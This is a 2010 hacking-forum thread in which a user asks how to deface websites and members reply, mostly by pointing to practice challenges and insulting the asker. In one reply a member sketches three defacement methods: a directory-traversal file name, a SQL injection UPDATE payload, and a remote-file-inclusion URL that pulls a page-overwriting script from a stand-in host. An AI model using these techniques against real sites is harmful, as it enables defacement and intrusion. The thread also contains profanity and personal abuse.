Follow us on Twitter!
Imagination is more valuable than knowledge - Albert Einstein
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 23
Guests Online: 20
Members Online: 3

Registered Members: 82838
Newest Member: w1zarrd
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

About defacing websites


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-09-10 20:57
First of all: I do not intend to compromise the security of any website. I am trying to learn for educational purposes only.

Is it common with web defacements? I mean like the index page has been replaced or edited. Which methods are used nowadays?
I've read that people used to hack IIS, but I think that's outdated... I'm not sure, tho.
Lets say that I install a web server on one computer. What tools should i use to deface it remotely?

Again: I just want to learn the methods Smile


Author

RE: About defacing websites

stealth-
Member



Posts: 1003
Location: Eh?
Joined: 10.04.09
Rank:
Mad User
Posted on 25-09-10 21:11
icecground wrote:
First of all: I do not intend to compromise the security of any website. I am trying to learn for educational purposes only.

Is it common with web defacements? I mean like the index page has been replaced or edited.


Is what common? I'm not sure what you're asking here.

Which methods are used nowadays?
I've read that people used to hack IIS, but I think that's outdated... I'm not sure, tho.


People still target IIS. IIS is Microsoft's web server software. More commonly Apache is used, however.

Lets say that I install a web server on one computer. What tools should i use to deface it remotely?


Hacking is not (and should not be) a "use tool on webserver and get root" activity. You need to learn how the exploits work and how to do them.

Again: I just want to learn the methods Smile


"Learning the methods" is not something we can just tell you over a single forum post. This *entire* website is dedicated to learning to hack, it takes time to figure it out, not just a single day of leisure reading. I don't think you understand what you're asking.


The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealt. . .
http://www.stealth-x.com
Author

RE: About defacing websites


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-09-10 21:14
Well... I'd like to learn how to find the exploits, then.


Author

RE: About defacing websites

stealth-
Member



Posts: 1003
Location: Eh?
Joined: 10.04.09
Rank:
Mad User
Posted on 25-09-10 21:21
icecground wrote:
Well... I'd like to learn how to find the exploits, then.


Again: Start with the challenges on this site. It's not something we can just "tell" you how to do like you are expecting us to. You have to put dedication and hard work into it. Learn a few programming languages, do all the challenges on this site, put years of work into it, then maybe you'll have something. It's no small accomplishment to be able to hack.

I'm not sure what sort of answer you are expecting from us, but we can't just be like "Yeah, you hack any website like this: ".


The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealt. . .
http://www.stealth-x.com
Author

RE: About defacing websites


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-09-10 21:25
Well, it's just that I know some programming and such, and now I want to learn web defacement and server hacking. I know it will be hard, but I want to know where I can start, and how I do it =)


Author

RE: About defacing websites

stealth-
Member



Posts: 1003
Location: Eh?
Joined: 10.04.09
Rank:
Mad User
Posted on 25-09-10 21:30
Start with the challenges on this site.
If you really want, it's also very helpful to create your own webserver on your local machine and create exploits and learn how they work internally.


The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealt. . .
http://www.stealth-x.com
Author

RE: About defacing websites


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-09-10 21:33
Thanks for your support, but I'm still not really getting how I'm supposed to learn how to find the exploits. I've built some scripts in PHP on localhost, and tried SQL injection. But I want to learn server defacements.
I thank you so much for your time and hope my questions aren't too dumb =D


Author

RE: About defacing websites

stealth-
Member



Posts: 1003
Location: Eh?
Joined: 10.04.09
Rank:
Mad User
Posted on 25-09-10 21:41
icecground wrote:
Thanks for your support, but I'm still not really getting how I'm supposed to learn how to find the exploits.


You learn to find the exploits by understanding how they work.

I've built some scripts in PHP on localhost, and tried SQL injection. But I want to learn server defacements.


The 'server defacements' you are talking about is just using the exploit to gain privileged that allow you to overwrite files on the webserver with your own files. You have to gain access first.


The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealt. . .
http://www.stealth-x.com
Author

RE: About defacing websites


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-09-10 21:43
Well in order to test the exploits i must now what to do, aint that so? I can't do a SQL injection without knowing what to write.
And could you give an example on how to overwrite a file? Just so I can understand


Author

RE: About defacing websites


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-09-10 21:58
http://en.wikiped. . ._injection


I would venture to guess you have used google to aquire information you seek - if not, its a good place to start for learning, howtos, tutorials etc.... and for hands on try all the challenges relating to what you want to learn.


Good luck!


Author

RE: About defacing websites


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 25-09-10 22:01
Well yes. But I allready know SQL injections, kinda. And if I want more information in how to do SQL injections I'll google it. But as previously written I want to replace a page on a web server with some method.
And I'm looking for documentation/tutorials on how to do this.


Author

RE: About defacing websites

stealth-
Member



Posts: 1003
Location: Eh?
Joined: 10.04.09
Rank:
Mad User
Posted on 25-09-10 23:36
icecground wrote:
Well yes. But I allready know SQL injections, kinda. And if I want more information in how to do SQL injections I'll google it. But as previously written I want to replace a page on a web server with some method.
And I'm looking for documentation/tutorials on how to do this.


Here are some examples:

1. The site in question has an upload forum. Upload a file and save it with the name "../index.html". That moves up a directory and will write to index.html with the file. That's called directory traversal

2. Say the site uses Mysql and you figure out how to execute any SQL commands you would like via an injection. Knowing the database structure, you could write a command like: "'; UPDATE pages SET content = "Hacked by Stealth-!" WHERE page = index.php". That's SQL injection.

3. You manage to get a RFI. The site has PHP script like: "page.php?get=index.php". You can include a PHP document like this: "page.php?get=http://yoursite.com/evilscript.php". Then evilscript.php can be a PHP script which fopen's index.html for writing and writes "Hacked by Stealth-!" to it. That's remote file inclusion.

There are a plethora of ways to do it. The above examples are very simple and probably not going to work with admin's who have any sense, but there are sites that are that insecure. The challenges here cover things exactly like the ones above. I'm getting seriously tired of spoon feeding you here.


The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealt. . .
http://www.stealth-x.com
Author

RE: About defacing websites

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 25-09-10 23:42
Get the fuck out of here you bloody idiot.



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: About defacing websites

fashizzlepop
Member



Posts: 482
Location: Old folks home.
Joined: 08.04.08
Rank:
Moderate
Posted on 26-09-10 09:02
If you still have these questions after beating all the challenges your member page says, you are exactly what spyware called you. My guess is you cheated or just found spoilers.


"The definition of insanity is doing the same thing over and over again and expecting different results.”
~Albert Einstein~


csullivan.codeinspire.net/images/boomsig2.png
fashizzlepop@gmail.com http://csullivan.codeinspire.net/
Author

RE: About defacing websites


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 26-09-10 12:55
I've beaten them myself, thank you very much.
And I thank stealth- for the info, although since I've beaten the missions I know about the different ways, but just not seen defaceing that way. Well, since I can't post here because I get flamed by people who probably doesn't have enough social skills to participate in a discussion, I'll stop writing here.


Author

RE: About defacing websites

spyware
Member



Posts: 4192
Location: The Netherlands
Joined: 14.04.07
Rank:
God
Warn Level: 90
Posted on 26-09-10 13:40
icecground wrote:
I've beaten them myself, thank you very much.
And I thank stealth- for the info, although since I've beaten the missions I know about the different ways, but just not seen defaceing that way. Well, since I can't post here because I get flamed by people who probably doesn't have enough social skills to participate in a discussion, I'll stop writing here.


Stupid questions beget stupid answers. If you really want to learn something about security, install *nix, learn some C, Perl, and learn how computers handle memory (ie. read Smashing the Stack for Fun and Profit a few times).

Report back when you've got that down, I guess?



img507.imageshack.us/img507/3580/spynewsig3il1.png
"The chowner of property." - Zeph
[small]
Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert
[/s
http://bitsofspy.net
Author

RE: About defacing websites

korg
Admin from hell



Posts: 2798
Location: ENDING YOUR ONLINE EXPERIENCE!
Joined: 01.01.06
Rank:
God
Posted on 26-09-10 13:54
icecground wrote:
I'll stop writing here.


Good idea.


i57.photobucket.com/albums/g215/korg1269/shodan13.jpg

I deal in pain, All life I drain, I dominate, I seal your fate.
O R